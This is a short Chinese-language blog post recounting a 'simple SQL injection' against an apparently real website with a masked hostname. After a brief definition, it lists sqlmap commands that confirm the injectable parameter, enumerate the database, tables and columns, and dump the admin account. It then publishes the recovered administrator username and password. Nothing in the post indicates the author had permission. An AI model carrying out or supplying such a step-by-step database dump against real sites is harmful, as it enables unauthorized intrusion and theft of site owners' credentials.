記一次簡單的sql註入
什麽是sql註入攻擊? 所謂SQL註入式攻擊,就是攻擊者把SQL命令插入到Web表單的輸入域或頁面請求的查詢字符串,欺騙服務器執行惡意的SQL命令。在某些表單中,用戶輸入的內容直接用來構造(或者影響)動態SQL命令,或作為存儲過程的輸入參數,這類表單特別容易受到SQL註入式攻擊。
1.判斷註入點是否有效
sqlmap -u "http://xxx.xxx.com/product.php?type_id=59"
2,查找數據庫
sqlmap -u "http://xxx.xxx.com/product.php?type_id=59" --dbs
爆出數據庫名了, uxRaMeqAZwAyvZqJXiZP
3,通過1中的數據庫查找對應的表
sqlmap -u "http://xxx.xxx.com/product.php?type_id=59" --tables -D "uxRaMeqAZwAyvZqJXiZP"
4,通過2中的數據表得到字段
sqlmap -u "http://xxx.xxx.com/product.php?type_id=59" --columns -D "uxRaMeqAZwAyvZqJXiZP" -T "admin"
4,通過3得到字段值,即賬號密碼
sqlmap -u "http://xxx.xxx.com/product.php?type_id=59" --dump -D "uxRaMeqAZwAyvZqJXiZP" -T "admin" -C "admin_name,admin_pass"
登陸賬號密碼為admin,qiju
好了,本來我還想找登陸後臺的,但找不到,我就不截圖了。
記一次簡單的sql註入